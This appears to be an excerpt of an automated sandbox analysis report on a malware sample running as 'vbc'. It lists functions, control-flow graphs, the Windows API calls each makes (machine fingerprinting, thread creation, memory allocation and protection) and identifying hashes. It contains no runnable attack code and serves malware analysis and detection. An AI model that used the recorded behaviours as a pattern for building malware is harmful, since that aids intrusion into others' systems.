                                                                                                                                                                      • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                      • API String ID: 2812500916-3543104150
                                                                                                                                                                      • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                      • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                      • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                      • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                      Function 00D38550 Relevance: 20.0, APIs: 13, Instructions: 510COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                      • Opcode ID: 4bf99b2000ace72936b72d77f6c937232e1dc6fdeaa520fa9892a52d394af213
                                                                                                                                                                      • Instruction ID: 6c671c0cc518218c71236e535eef93dc8ad6d6df43b153c7268b01f9ef2095ce
                                                                                                                                                                      • Opcode Fuzzy Hash: 4bf99b2000ace72936b72d77f6c937232e1dc6fdeaa520fa9892a52d394af213
                                                                                                                                                                      • Instruction Fuzzy Hash: 2BE157A590D7419ECB3A47289C097762BA06F72771F5C0796F4A2D61F2EDA48C08F237
                                                                                                                                                                      Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 525 40af66-40af6e 526 40af7d-40af88 call 40b84d 525->526 529 40af70-40af7b call 40d2e3 526->529 530 40af8a-40af8b 526->530 529->526 533 40af8c-40af98 529->533 534 40afb3-40afca call 40af49 call 40cd39 533->534 535 40af9a-40afb2 call 40aefc call 40d2bd 533->535 535->534
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,?,?,0040D128,00000001,?,?,?,?,?,0040AF59,?), ref: 0040B8C4
                                                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1411284514-0
                                                                                                                                                                      • Opcode ID: b345fa5dd82e9b4f5c74ef0e5f3feb58fb763bf4bd372753273fca7b37c13978
                                                                                                                                                                      • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                      • Opcode Fuzzy Hash: b345fa5dd82e9b4f5c74ef0e5f3feb58fb763bf4bd372753273fca7b37c13978
                                                                                                                                                                      • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                      Function 00D37DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 544 d37df0-d37dfa 545 d37e00 544->545 546 d38288-d3829a call d20d80 544->546 545->546 548 d37e06-d37e15 GetComputerNameW 545->548 552 d382a0 546->552 553 d3851e-d3852d call d20d80 546->553 550 d382b6-d382bb 548->550 551 d37e1b 548->551 551->550 554 d37e21-d37e2d 551->554 552->553 555 d382a6 552->555 558 d37dbc-d37dce 555->558 559 d382ac 555->559 566 d37d35 558->566 567 d37d6c-d37d80 GetVolumeInformationW 558->567 562 d382b2-d382b4 559->562 563 d37d20-d37d2b 559->563 562->550 564 d37d61-d37d68 563->564 565 d37d2d-d37d94 563->565 570 d37de5-d37dea 564->570 571 d37d6a 564->571 565->564 575 d37d96 565->575 566->567 569 d37d37-d37d39 566->569 572 d37d3b-d37d46 569->572 573 d37d83-d37d8c GetWindowsDirectoryW 570->573 574 d37dec 570->574 571->567 571->570 576 d37d97-d37d98 572->576 577 d37d48-d37dac 572->577 573->572 579 d37d8e-d37da6 573->579 574->573 578 d37dee 574->578 575->576 582 d37de2 576->582 583 d37d9a-d37d9f 576->583 577->576 585 d37dae-d37db3 577->585 578->544 579->558 584 d37da8 579->584 584->558 586 d37daa-d37dba 584->586 586->558
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: 30c8bedb3fdf1f77f525af28aebae08b3c563a708bc1f3cce617822420f570f3
                                                                                                                                                                      • Instruction ID: e018e2d24c5f3d90b4c21939127abba28d8120d0513b723b0ff8cf5b62d98184
                                                                                                                                                                      • Opcode Fuzzy Hash: 30c8bedb3fdf1f77f525af28aebae08b3c563a708bc1f3cce617822420f570f3
                                                                                                                                                                      • Instruction Fuzzy Hash: CB2137F4A4DB44FFDA355718BC06BB93A746F62B10F8C448AF8C8561D2D5A86C08D277
                                                                                                                                                                      Function 00D15A3B Relevance: 3.1, APIs: 2, Instructions: 51threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 588 d15a3b-d15a3f 589 d15a45 588->589 590 d14f7c-d14f91 588->590 591 d15a4b-d15b37 CreateThread RtlExitUserThread call d15d20 589->591 592 d151ae-d151d6 589->592 605 d15b3c-d15b51 591->605
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00D155C0,?,00000000,00000000), ref: 00D15A51
                                                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 00D15B11
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread$CreateExitUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4108186749-0
                                                                                                                                                                      • Opcode ID: 5bf56e9ae101de6de6f23c76d907f5a9a7472b8b9d6eef196e720cb5d7295516
                                                                                                                                                                      • Instruction ID: d61f43656f190db87e58a1fe8939de48a95d584e51febcd8c24b4cbe8f4af90a
                                                                                                                                                                      • Opcode Fuzzy Hash: 5bf56e9ae101de6de6f23c76d907f5a9a7472b8b9d6eef196e720cb5d7295516
                                                                                                                                                                      • Instruction Fuzzy Hash: E511FB1150DBC2EED7138B6878253A6BFA05FA2720F5D06CAD0D14E1DACA5D498C97B3
                                                                                                                                                                      Function 00D15D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 683 d15d20 684 d15d22 683->684 685 d15d26-d15d2d 683->685 684->685 686 d15d24 684->686 687 d15d36-d15d37 685->687 688 d15d2f 685->688 686->685 689 d15d39-d15d42 VirtualAlloc 687->689 690 d15d5d 687->690 688->687 691 d15d30-d15d31 688->691 692 d15d33-d15d35 689->692 693 d15d44 689->693 694 d15d64 690->694 695 d15d5f 690->695 691->692 692->687 693->692 696 d15d46-d15d50 693->696 698 d15d66 694->698 699 d15d69-d15d73 VirtualFree 694->699 695->694 697 d15d61 695->697 700 d15d52 696->700 701 d15d54-d15d5b 696->701 697->694 702 d15d63 697->702 698->699 703 d15d68 698->703 700->701 701->690 701->694 702->694 703->699
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00D15D6D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                      • Opcode ID: 051e81782a83acd00b91df716f924aa9f748da9625b79b21f6ba2053fd3f53a1
                                                                                                                                                                      • Instruction ID: 3a803d116eb7203750ef16afa4399f59373a1409fcd65895bfb0b2f4b3209b36
                                                                                                                                                                      • Opcode Fuzzy Hash: 051e81782a83acd00b91df716f924aa9f748da9625b79b21f6ba2053fd3f53a1
                                                                                                                                                                      • Instruction Fuzzy Hash: 19F0B491A04F00FADE7E0368FD4EBF12A2067E1729F0C4145AA41591BE8E5D1CC6C732
                                                                                                                                                                      Function 074BF4C0 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 704 74bf4c0-74bf574 VirtualProtect 707 74bf57d-74bf5c5 704->707 708 74bf576-74bf57c 704->708 708->707
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 074BF564
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2660779676.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_74b0000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                      • Opcode ID: ee74fb32430a578decbb40d4091a04ee43fcd5610cbab7c8829f61b44ed4c122
                                                                                                                                                                      • Instruction ID: e4172cdb25a28aaa09bfc5db25ef30283d591c6ba8a6cd79d19e6af02b608339
                                                                                                                                                                      • Opcode Fuzzy Hash: ee74fb32430a578decbb40d4091a04ee43fcd5610cbab7c8829f61b44ed4c122
                                                                                                                                                                      • Instruction Fuzzy Hash: C531A7B8D012089FCF20CFA9D984ADEFBF0BB49310F10942AE818B7210D735A945CF68
                                                                                                                                                                      Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 713 401870-401883 call 40af66 716 4018b2 713->716 717 401885-4018a2 SysAllocString 713->717 718 4018b4-4018b8 716->718 717->718 719 4018a4-4018a6 717->719 721 4018c4-4018c9 718->721 722 4018ba-4018bf call 40ad90 718->722 719->718 720 4018a8-4018ad call 40ad90 719->720 720->716 722->721
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                      • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocString_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 959018026-0
                                                                                                                                                                      • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                                                      • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                                                      • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                                                      • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                                                                      Function 00D14B70 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 725 d14b70-d14b7c GetUserDefaultUILanguage 726 d14b82 725->726 727 d14c19 725->727 726->727 728 d14b88-d14b8e 726->728 729 d14f26-d14f2f 727->729 730 d14c1f-d14c24 727->730 731 d14e82 729->731 732 d14f35 729->732 733 d14e84 731->733 734 d14ebb-d14ec9 731->734 732->731 735 d14f3b 732->735 737 d14e50 733->737 738 d14ea3 733->738 735->735 737->738 739 d14e52 737->739 739->731
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetUserDefaultUILanguage.KERNEL32(771B2EE0,00000001,?,0000004C,00000000,Function_00004F70,00000000,00000000), ref: 00D14B76
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLanguageUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 95929093-0
                                                                                                                                                                      • Opcode ID: a39534d83b044c63ee524c14764bb7529c6b1c4b4c8a7b92f50416e732785cdd
                                                                                                                                                                      • Instruction ID: 80409aef0daf34f305591285f54b6976c1c22cc0fbd771e0c61e4006bb1f39a6
                                                                                                                                                                      • Opcode Fuzzy Hash: a39534d83b044c63ee524c14764bb7529c6b1c4b4c8a7b92f50416e732785cdd
                                                                                                                                                                      • Instruction Fuzzy Hash: 0BE0D859905612F6DE70462879014F46100BB10321FED0783B576C38D18E548DC051B3
                                                                                                                                                                      Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 740 40d534-40d556 HeapCreate 741 40d558-40d559 740->741 742 40d55a-40d563 740->742
                                                                                                                                                                      APIs
                                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                                                      • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                      • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                                      • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                      • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                                                      Function 074BF790 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 743 74bf790-74bf81e CloseHandle 746 74bf820-74bf826 743->746 747 74bf827-74bf869 743->747 746->747
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2660779676.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_74b0000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 754eee8723e5ba5089f63256270bc6e5c4d2ef3e108253d9d01eef48c0158242
                                                                                                                                                                      • Instruction ID: e72549c31421d844f99b9fcda6e1c4a3e953ad2bdbd416f87d9f82b0bf1653e3
                                                                                                                                                                      • Opcode Fuzzy Hash: 754eee8723e5ba5089f63256270bc6e5c4d2ef3e108253d9d01eef48c0158242
                                                                                                                                                                      • Instruction Fuzzy Hash: 8831ABB4D112189FCF24CFAAD985ADEFBF4AB49310F14942AE819B7340C735A905CFA4
                                                                                                                                                                      Function 0731D030 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2655283229.000000000731D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0731D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_731d000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5fd1a686c0a123e8c933f5b56b8b9d4b434c6ba1fcde1373798f30149555eefb
                                                                                                                                                                      • Instruction ID: af28647e8c7393fc12cbf0ddb03465dc8f3e5d25c919d2590b463f11cbf91b85
                                                                                                                                                                      • Opcode Fuzzy Hash: 5fd1a686c0a123e8c933f5b56b8b9d4b434c6ba1fcde1373798f30149555eefb
                                                                                                                                                                      • Instruction Fuzzy Hash: CD2122F5614200DFEB18DF14D9C0B26BBA5EB85314F20C66DD80D0B246C336D847CA63
                                                                                                                                                                      Function 0731D02B Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2655283229.000000000731D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0731D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_731d000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 49f01ab7346092539da7b2fb4ebb366b6ab3489dd262bc957b6d93f642452a5a
